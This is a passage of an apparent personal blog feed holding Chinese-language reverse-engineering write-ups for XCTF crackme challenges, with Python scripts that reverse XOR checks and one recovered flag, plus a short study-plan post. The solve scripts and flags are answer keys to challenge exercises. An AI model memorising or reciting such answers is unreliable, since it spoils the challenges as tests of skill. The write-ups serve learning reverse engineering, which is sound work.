spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">435E30=[0x1a,0,0,0x51,0x5,0x11,0x54,0x56,0x55,0x59,0x1d,0x9,0x5d,0x12,0,0]</span><br></pre></td></tr></table></figure></div><p>提取完数据我们看逻辑</p><p><code>sub_40108C</code>函数</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/MY9mkrbaZWs81Ul.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>化成代码:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line">a1 = unk_435DC0</span><br><span class="line"><span class="keyword">char</span> *v3</span><br><span class="line">v3 = <span class="built_in">malloc</span>(<span class="number">56</span>>><span class="number">2</span>) <span class="comment">// 56>>2 = 14</span></span><br><span class="line"><span class="keyword">for</span>(i = <span class="number">0</span>; i <<span class="number">14</span> ; ++i)</span><br><span class="line"> <span class="built_in">sprintf</span>(&v3[i],<span class="string">"%c"</span>,i^*(a1 + <span class="number">4</span>*i))</span><br><span class="line"></span><br><span class="line"> a1 = [<span class="number">102</span>, <span class="number">109</span>, <span class="number">99</span>, <span class="number">100</span>, <span class="number">127</span>, <span class="number">55</span>, <span class="number">53</span>, <span class="number">48</span>, <span class="number">48</span>, <span class="number">107</span>, <span class="number">58</span>, <span class="number">60</span>, <span class="number">59</span>, <span class="number">32</span> ]</span><br></pre></td></tr></table></figure></div><p>解这个函数</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">a1 = [<span class="number">102</span>, <span class="number">109</span>, <span class="number">99</span>, <span class="number">100</span>, <span class="number">127</span>, <span class="number">55</span>, <span class="number">53</span>, <span class="number">48</span>, <span class="number">48</span>, <span class="number">107</span>, <span class="number">58</span>, <span class="number">60</span>, <span class="number">59</span>, <span class="number">32</span> ]</span><br><span class="line">flag = <span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">14</span>):</span><br><span class="line"> flag += chr(a1[i]^i)</span><br></pre></td></tr></table></figure></div><p><code>sub_401041((int)&unk_435DC0, (int)&dword_435DF8, 0x38u)</code>函数</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/4l3cADT1dm5uwNH.png" alt="image-20201210173449644" title=""> </div> <div class="image-caption">image-20201210173449644</div> </figure><p>化成代码</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="keyword">char</span> *v5;</span><br><span class="line">v5 = <span class="built_in">malloc</span>(<span class="number">56</span>);</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">"%c"</span>,*a2[<span class="number">0</span>])</span><br><span class="line"><span class="keyword">for</span> (i = <span class="number">1</span>;i<<span class="number">14</span>;++i)</span><br><span class="line"> <span class="built_in">sprintf</span>(&v5[i],<span class="string">"%c"</span>,*(a1 + <span class="number">4</span>* i)^*(a2 + <span class="number">4</span>*i)^*(a1+ <span class="number">4</span>*i <span class="number">-4</span>))</span><br></pre></td></tr></table></figure></div><p>解这个函数</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">a2 = [<span class="number">55</span>, <span class="number">111</span>, <span class="number">56</span>, <span class="number">98</span>, <span class="number">54</span>, <span class="number">124</span>, <span class="number">55</span>, <span class="number">51</span>, <span class="number">52</span>, <span class="number">118</span>, <span class="number">51</span>, <span class="number">98</span>, <span class="number">100</span>, <span class="number">122</span>]</span><br><span class="line">temp = []</span><br><span class="line">flag += chr(a2[<span class="number">0</span>])</span><br><span class="line">temp.append(a2[<span class="number">0</span>])</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range (<span class="number">1</span>,<span class="number">14</span>):</span><br><span class="line"> x = (a1[i]^a2[i]^a1[i<span class="number">-1</span>])</span><br><span class="line"> flag += chr(x)</span><br><span class="line"> temp.append(x)</span><br></pre></td></tr></table></figure></div><p>最后一个函数<code>sub_4010C3((int)&unk_435DC0, (int)v3, (int)&dword_435E30, 56)</code></p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/fcPpmRa38nCUE4k.png" alt="image-20201210173723720" title=""> </div> <div class="image-caption">image-20201210173723720</div> </figure><p>解函数</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">a3 = [<span class="number">26</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">81</span>,<span class="number">5</span>,<span class="number">17</span>,<span class="number">84</span>,<span class="number">86</span>,<span class="number">85</span>,<span class="number">89</span>,<span class="number">29</span>,<span class="number">9</span>,<span class="number">93</span>,<span class="number">18</span>,<span class="number">0</span>,<span class="number">0</span>]</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">13</span>):</span><br><span class="line"> x += chr(a3[i+<span class="number">1</span>]^temp[i]^i)</span><br><span class="line"> </span><br><span class="line">flag += chr(a3[i]^a2[i]) + x</span><br></pre></td></tr></table></figure></div><p>完整的exp</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">a1 = [<span class="number">102</span>, <span class="number">109</span>, <span class="number">99</span>, <span class="number">100</span>, <span class="number">127</span>, <span class="number">55</span>, <span class="number">53</span>, <span class="number">48</span>, <span class="number">48</span>, <span class="number">107</span>, <span class="number">58</span>, <span class="number">60</span>, <span class="number">59</span>, <span class="number">32</span> ]</span><br><span class="line">a2 = [<span class="number">55</span>, <span class="number">111</span>, <span class="number">56</span>, <span class="number">98</span>, <span class="number">54</span>, <span class="number">124</span>, <span class="number">55</span>, <span class="number">51</span>, <span class="number">52</span>, <span class="number">118</span>, <span class="number">51</span>, <span class="number">98</span>, <span class="number">100</span>, <span class="number">122</span>]</span><br><span class="line">a3 = [<span class="number">26</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">81</span>,<span class="number">5</span>,<span class="number">17</span>,<span class="number">84</span>,<span class="number">86</span>,<span class="number">85</span>,<span class="number">89</span>,<span class="number">29</span>,<span class="number">9</span>,<span class="number">93</span>,<span class="number">18</span>,<span class="number">0</span>,<span class="number">0</span>]</span><br><span class="line">temp=[]</span><br><span class="line">flag=<span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">14</span>):</span><br><span class="line"> flag+=chr(a1[i]^i)</span><br><span class="line"></span><br><span class="line">flag+=chr(a2[<span class="number">0</span>])</span><br><span class="line">temp.append(a2[<span class="number">0</span>])</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>,<span class="number">14</span>):</span><br><span class="line"> x=a1[i]^a2[i]^a1[i<span class="number">-1</span>]</span><br><span class="line"> flag+=chr(x)</span><br><span class="line"> temp.append(x)</span><br><span class="line"></span><br><span class="line">x=<span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">13</span>):</span><br><span class="line"> x+=chr(a3[i+<span class="number">1</span>]^(temp[i])^i)</span><br><span class="line">flag+= chr(a3[<span class="number">0</span>] ^ a2[<span class="number">0</span>]) + x</span><br><span class="line">print(flag)</span><br><span class="line"></span><br><span class="line"><span class="comment"># flag{2378b077-7d6e-4564-bdca-7eec8eede9a2}</span></span><br></pre></td></tr></table></figure></div><h3 id="动态分析"><a href="#动态分析" class="headerlink" title="动态分析"></a>动态分析</h3><p>其实也可以用动态调试的方法做,在三个函数的位置分别下断点</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/jiKHz9TbvAPLtEO.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/udED4eAzTQyn8cb.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/3nGJAiYTKLb1ePa.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>把得到的flag拼凑到一起即为答案。</p><p>刚刚发现自己脱壳出来的exe文件无法在od里动调,所以我试不了这种方法,图是偷的别人的。至于为什么动调不了等我回去问问大佬们吧。心态有一点小炸裂,无语凝噎!!!</p>]]></content>
<summary type="html">
<p>题目虽然常规,但是学到了一些关于手动脱壳的知识。</p>
</summary>
<category term="CTF" scheme="https://github.com/gha01un/gha01un.github.io/categories/CTF/"/>
<category term="RE" scheme="https://github.com/gha01un/gha01un.github.io/tags/RE/"/>
</entry>
<entry>
<title>寒假之前的计划</title>
<link href="https://github.com/gha01un/gha01un.github.io/2020/12/02/%E5%AF%92%E5%81%87%E4%B9%8B%E5%89%8D%E7%9A%84%E8%AE%A1%E5%88%92/"/>
<id>https://github.com/gha01un/gha01un.github.io/2020/12/02/%E5%AF%92%E5%81%87%E4%B9%8B%E5%89%8D%E7%9A%84%E8%AE%A1%E5%88%92/</id>
<published>2020-12-02T09:07:38.653Z</published>
<updated>2020-12-02T09:17:54.019Z</updated>
<content type="html"><![CDATA[<p>要认真对待!</p><a id="more"></a><ul><li>认真学习密码学,网安课本,网安密码实验要认真复现</li><li>熟悉java语言的基本语法,加强写python代码的能力</li><li>明确考研计划</li><li>认真学习英语,坚持背单词刷题</li><li>减少打CTF的时间(寒假前不会利用课余时间学习CTF了)</li><li>寒假之后准备入门一下pwn</li><li>减少喝酒,嗨皮次数</li></ul>]]></content>
<summary type="html">
<p>要认真对待!</p>
</summary>
<category term="杂谈" scheme="https://github.com/gha01un/gha01un.github.io/categories/%E6%9D%82%E8%B0%88/"/>
<category term="plan" scheme="https://github.com/gha01un/gha01un.github.io/tags/plan/"/>
</entry>
<entry>
<title>XCTF进阶区</title>
<link href="https://github.com/gha01un/gha01un.github.io/2020/12/01/XCTF%E9%AB%98%E6%89%8B%E5%8C%BA/"/>
<id>https://github.com/gha01un/gha01un.github.io/2020/12/01/XCTF%E9%AB%98%E6%89%8B%E5%8C%BA/</id>
<published>2020-12-01T06:36:35.240Z</published>
<updated>2021-01-11T01:42:51.158Z</updated>
<content type="html"><![CDATA[<p>实验课继续水一水!</p><a id="more"></a><p>XCTF逆向进阶区第二页也快做完了,实验课赶紧补一补wp吧</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/01/bJN1qua8BT7ZoQU.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h3 id="elrond32"><a href="#elrond32" class="headerlink" title="elrond32"></a>elrond32</h3><p>拖入ida中查看main函数</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/01/1XKgsRHWxOdUJlT.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>看见Access granted显然可知sub_8048538()函数是输出flag的函数,点开看看</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/01/fbkSXxUCZ3qDNre.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>看代码发现我们需要得到数组a2的值,于是回到main函数,发现a2与sub_8048414()函数有关,点开看看</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/01/VL6hPGlkgJOniCS.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>分析函数写出代码!</p><p>继续分析sub_8048538()函数,发现我们还需要知道v2数组的值,根据代码</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">qmemcpy(v2, &unk_8048760, sizeof(v2));</span><br></pre></td></tr></table></figure></div><p>知道v2是从unk_8048760处复制了33个int<br>查看unk_8048760的值</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/01/rc7Qq3TVMxEvPYg.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p><strong>一个int占4个内存,所以剩下3个的内存用0填充</strong>,最后得出</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">data=[<span class="number">0x0F</span>,<span class="number">0x1F</span>,<span class="number">0x04</span>,<span class="number">0x09</span>,<span class="number">0x1C</span>,<span class="number">0x12</span>,<span class="number">0x42</span>,<span class="number">0x09</span>,<span class="number">0x0C</span>,<span class="number">0x44</span>,<span class="number">0x0D</span>,<span class="number">0x07</span>,<span class="number">0x09</span>,<span class="number">0x06</span>,<span class="number">0x2D</span>,<span class="number">0x37</span>,<span class="number">0x59</span>,<span class="number">0x1E</span>,<span class="number">0x00</span>,<span class="number">0x59</span>,<span class="number">0x0F</span>,<span class="number">0x08</span>,<span class="number">0x1C</span>,<span class="number">0x23</span>,<span class="number">0x36</span>,<span class="number">0x07</span>,<span class="number">0x55</span>,<span class="number">0x02</span>,<span class="number">0x0C</span>,<span class="number">0x08</span>,<span class="number">0x41</span>,<span class="number">0x0A</span>,<span class="number">0x14</span>]</span><br></pre></td></tr></table></figure></div><p>编写代码得到flag</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">a=<span class="string">'ie ndags r'</span></span><br><span class="line">x=<span class="number">0</span></span><br><span class="line">s=[]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">9</span>):</span><br><span class="line"> x=<span class="number">7</span>*x%<span class="number">11</span></span><br><span class="line"> s.append(a[x])</span><br><span class="line"> x+=<span class="number">1</span></span><br><span class="line">print(<span class="string">''</span>.join(s))</span><br><span class="line">data=[<span class="number">0x0F</span>,<span class="number">0x1F</span>,<span class="number">0x04</span>,<span class="number">0x09</span>,<span class="number">0x1C</span>,<span class="number">0x12</span>,<span class="number">0x42</span>,<span class="number">0x09</span>,<span class="number">0x0C</span>,<span class="number">0x44</span>,<span class="number">0x0D</span>,<span class="number">0x07</span>,<span class="number">0x09</span>,<span class="number">0x06</span>,<span class="number">0x2D</span>,<span class="number">0x37</span>,<span class="number">0x59</span>,<span class="number">0x1E</span>,<span class="number">0x00</span>,<span class="number">0x59</span>,<span class="number">0x0F</span>,<span class="number">0x08</span>,<span class="number">0x1C</span>,<span class="number">0x23</span>,<span class="number">0x36</span>,<span class="number">0x07</span>,<span class="number">0x55</span>,<span class="number">0x02</span>,<span class="number">0x0C</span>,<span class="number">0x08</span>,<span class="number">0x41</span>,<span class="number">0x0A</span>,<span class="number">0x14</span>]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">33</span>):</span><br><span class="line"> print(chr(ord(s[i%<span class="number">8</span>])^data[i]),end=<span class="string">''</span>)</span><br></pre></td></tr></table></figure></div><h3 id="tt3441810"><a href="#tt3441810" class="headerlink" title="tt3441810"></a>tt3441810</h3><p>这题根本不是逆向题</p><p>用01editor打开</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/01/GqYQuOnfXgdxVBm.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>所以这道题的16进制转ASCII码又是一堆16进制,那我们把得到的16进制转ASCII</p><p>得到了很奇怪的输出,HH4$HH重复出现。</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">text=[<span class="number">0x68</span>, <span class="number">0x66</span>, <span class="number">0x6C</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0xBF</span>, <span class="number">0x01</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>,</span><br><span class="line"> <span class="number">0x8D</span>, <span class="number">0x34</span>, <span class="number">0x24</span>, <span class="number">0x48</span>, <span class="number">0xBA</span>, <span class="number">0x02</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0xB8</span>, <span class="number">0x01</span>,</span><br><span class="line"> <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x0F</span>, <span class="number">0x05</span>, <span class="number">0x68</span>, <span class="number">0x61</span>, <span class="number">0x67</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0xBF</span>,</span><br><span class="line"> <span class="number">0x01</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0x8D</span>, <span class="number">0x34</span>, <span class="number">0x24</span>, <span class="number">0x48</span>, <span class="number">0xBA</span>, <span class="number">0x02</span>, <span class="number">0x00</span>,</span><br><span class="line"> <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0xB8</span>, <span class="number">0x01</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>,</span><br><span class="line"> <span class="number">0x0F</span>, <span class="number">0x05</span>, <span class="number">0x68</span>, <span class="number">0x7B</span>, <span class="number">0x70</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0xBF</span>, <span class="number">0x01</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>,</span><br><span class="line"> <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0x8D</span>, <span class="number">0x34</span>, <span class="number">0x24</span>, <span class="number">0x48</span>, <span class="number">0xBA</span>, <span class="number">0x02</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>,</span><br><span class="line"> <span class="number">0xB8</span>, <span class="number">0x01</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x0F</span>, <span class="number">0x05</span>, <span class="number">0x68</span>, <span class="number">0x6F</span>, <span class="number">0x70</span>, <span class="number">0x00</span>, <span class="number">0x00</span>,</span><br><span class="line"> <span class="number">0x48</span>, <span class="number">0xBF</span>, <span class="number">0x01</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0x8D</span>, <span class="number">0x34</span>, <span class="number">0x24</span>, <span class="number">0x48</span>, <span class="number">0xBA</span>,</span><br><span class="line"> <span class="number">0x02</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0xB8</span>, <span class="number">0x01</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>,</span><br><span class="line"> <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x0F</span>, <span class="number">0x05</span>, <span class="number">0x68</span>, <span class="number">0x70</span>, <span class="number">0x6F</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0xBF</span>, <span class="number">0x01</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>,</span><br><span class="line"> <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0x8D</span>, <span class="number">0x34</span>, <span class="number">0x24</span>, <span class="number">0x48</span>, <span class="number">0xBA</span>, <span class="number">0x02</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>,</span><br><span class="line"> <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0xB8</span>, <span class="number">0x01</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x0F</span>, <span class="number">0x05</span>, <span class="number">0x68</span>, <span class="number">0x70</span>, <span class="number">0x72</span>,</span><br><span class="line"> <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0xBF</span>, <span class="number">0x01</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0x8D</span>, <span class="number">0x34</span>, <span class="number">0x24</span>,</span><br><span class="line"> <span class="number">0x48</span>, <span class="number">0xBA</span>, <span class="number">0x02</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0xB8</span>, <span class="number">0x01</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>,</span><br><span class="line"> <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x0F</span>, <span class="number">0x05</span>, <span class="number">0x68</span>, <span class="number">0x65</span>, <span class="number">0x74</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0xBF</span>, <span class="number">0x01</span>, <span class="number">0x00</span>, <span class="number">0x00</span>,</span><br><span class="line"> <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0x8D</span>, <span class="number">0x34</span>, <span class="number">0x24</span>, <span class="number">0x48</span>, <span class="number">0xBA</span>, <span class="number">0x02</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>,</span><br><span class="line"> <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0xB8</span>, <span class="number">0x01</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x0F</span>, <span class="number">0x05</span>, <span class="number">0x68</span>,</span><br><span class="line"> <span class="number">0x7D</span>, <span class="number">0x0A</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0xBF</span>, <span class="number">0x01</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0x8D</span>,</span><br><span class="line"> <span class="number">0x34</span>, <span class="number">0x24</span>, <span class="number">0x48</span>, <span class="number">0xBA</span>, <span class="number">0x02</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0xB8</span>, <span class="number">0x01</span>, <span class="number">0x00</span>,</span><br><span class="line"> <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x0F</span>, <span class="number">0x05</span>, <span class="number">0x48</span>, <span class="number">0x31</span>, <span class="number">0xFF</span>, <span class="number">0x48</span>, <span class="number">0xB8</span>, <span class="number">0x3C</span>, <span class="number">0x00</span>, <span class="number">0x00</span>,</span><br><span class="line"> <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x0F</span>, <span class="number">0x05</span> ]</span><br><span class="line">t=[]</span><br><span class="line">s=<span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> x <span class="keyword">in</span> text:</span><br><span class="line"> <span class="keyword">if</span> x>=<span class="number">32</span> <span class="keyword">and</span> x<=<span class="number">125</span>:</span><br><span class="line"> t.append(x)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> t:</span><br><span class="line"> s+=chr(i)</span><br><span class="line">print(s)</span><br><span class="line">s=s.replace(<span class="string">'HH4$HH'</span>,<span class="string">''</span>)</span><br><span class="line">print(s)</span><br><span class="line">s=s.replace(<span class="string">'h'</span>,<span class="string">''</span>)</span><br><span class="line">print(s)</span><br></pre></td></tr></table></figure></div><h3 id="re2-cpp-is-awesome"><a href="#re2-cpp-is-awesome" class="headerlink" title="re2-cpp-is-awesome"></a>re2-cpp-is-awesome</h3><p>一道c++的题目,这道题我在给新生赛出逆向题目的时候写过类似样子的源码,所以比较的熟悉。</p><p>打开ida查看主函数</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/01/5FdQxNc41jBKUIo.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>大部分都是些没有用的代码,第27行代码,是一个for循环,没有结束条件,每次增加sub_400D7A(&i),即1字节</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">_QWORD *__fastcall sub_400D7A(_QWORD *a1)</span><br><span class="line">{</span><br><span class="line"> ++*a1;</span><br><span class="line"> return a1;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">for ( i = std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::begin(&v11); ; sub_400D7A(&i) )</span><br><span class="line">{</span><br><span class="line"> v13 = std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::end(&v11);</span><br><span class="line"> if ( !sub_400D3D((__int64)&i, (__int64)&v13) )// 循环结束条件</span><br><span class="line"> break;</span><br><span class="line"> v8 = (_BYTE *)sub_400D9A((__int64)&i); // 进行某种赋值</span><br><span class="line"> if ( *v8 != off_6020A0[dword_6020C0[v14]] ) // 重点!这里实际上就是一个数组套着数组</span><br><span class="line"> sub_400B56(&i, &v13);</span><br><span class="line"> ++v14; // 数组下标</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><p>通过对比sub_400B56(&i, &v13);和 sub_400B73(&i, &v13);函数,我们能够得到flag实际藏在if判断条件中</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">void __fastcall __noreturn sub_400B56(__int64 a1, __int64 a2, __int64 a3)</span><br><span class="line">{</span><br><span class="line"> std::operator<<<std::char_traits<char>>(&std::cout, "Better luck next time\n", a3);</span><br><span class="line"> exit(0);</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">__int64 __fastcall sub_400B73(__int64 a1, __int64 a2, __int64 a3)</span><br><span class="line">{</span><br><span class="line"> return std::operator<<<std::char_traits<char>>(&std::cout, "You should have the flag by now\n", a3);</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><p>进入off_6020A0和dword_6020C0我们可以看到</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/01/QHpRUCcTFz9ywOS.png" 